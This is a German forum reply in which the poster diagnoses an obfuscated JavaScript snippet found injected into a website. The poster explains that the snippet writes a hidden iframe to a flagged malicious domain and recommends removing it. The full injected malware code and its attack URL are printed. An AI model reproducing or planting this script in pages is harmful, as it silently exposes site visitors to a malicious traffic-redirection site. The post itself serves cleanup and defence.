Also das verify-v1 müsste ein Meta-Tag sein was du mal bei Analytics o.Ä. benutzt hast.

Der zweite Code:

Code:
<!-- o --><script>var fvk="<";var wph="i";var jvnka=" ";var gomnh="nhbcn='nEK6DQJo' doial='dhCke37D' gdzzh='gQWd7VrL' gazuj='hJVRBJkH' hxzpl='81GXG6dn' lsoir='yU8BhjRB' ngggo='xYmvNtUu' lrfwl='txkXFkqC' kxnos='qC3DWG3h' src=";var jzuvy="ame>";var cilee="om/tds/go.php?sid=1&xu=j";var beabi="?fpqUf ";var qzx="f";var jjm="r";var cyt="a";var cwapy="cpydh='aiptWeJC' gvhgz='i6pumOkl' gwyzq='hAUfSYnT' gypth='hE8P7iqB' gagmz='eTR4OD2h' fgodg='chkkfjFC' dqntd='X6hLXacU' bbmjz='VL01o6o0' ahuag='QkydgyBI' ";var unz="m";var oxo="e";var zpzre="width=612 ";var glvei="http://bestgreenstreet.c";var vmpsa="height=328 ";var qjfsw="style='display:none'";var clcnd=glvei+cilee;var mgvts="></ifr";document.write(fvk+wph+qzx+jjm+cyt+unz+oxo+jvnka+gomnh+clcnd+beabi+cwapy+zpzre+vmpsa+qjfsw+mgvts+jzuvy);</script><!-- c -->
Das ding erzeugt ein iframe zu einer Domain:
http://bestgreenstreet.com/tds/go.php?sid=1&xu=j Absichtlich nicht verlinkt

Diese meldet Firefox als attackierende Webseite!

Also raus damit! Wie er nun darein kam weiß ich nicht, da müsste man ursachenforschung betreiben, irgendeine Lücke in einem Script. Bei klamm gibt es auch einen Thread dazu http://www.klamm.de/forum/showthread.php?t=223792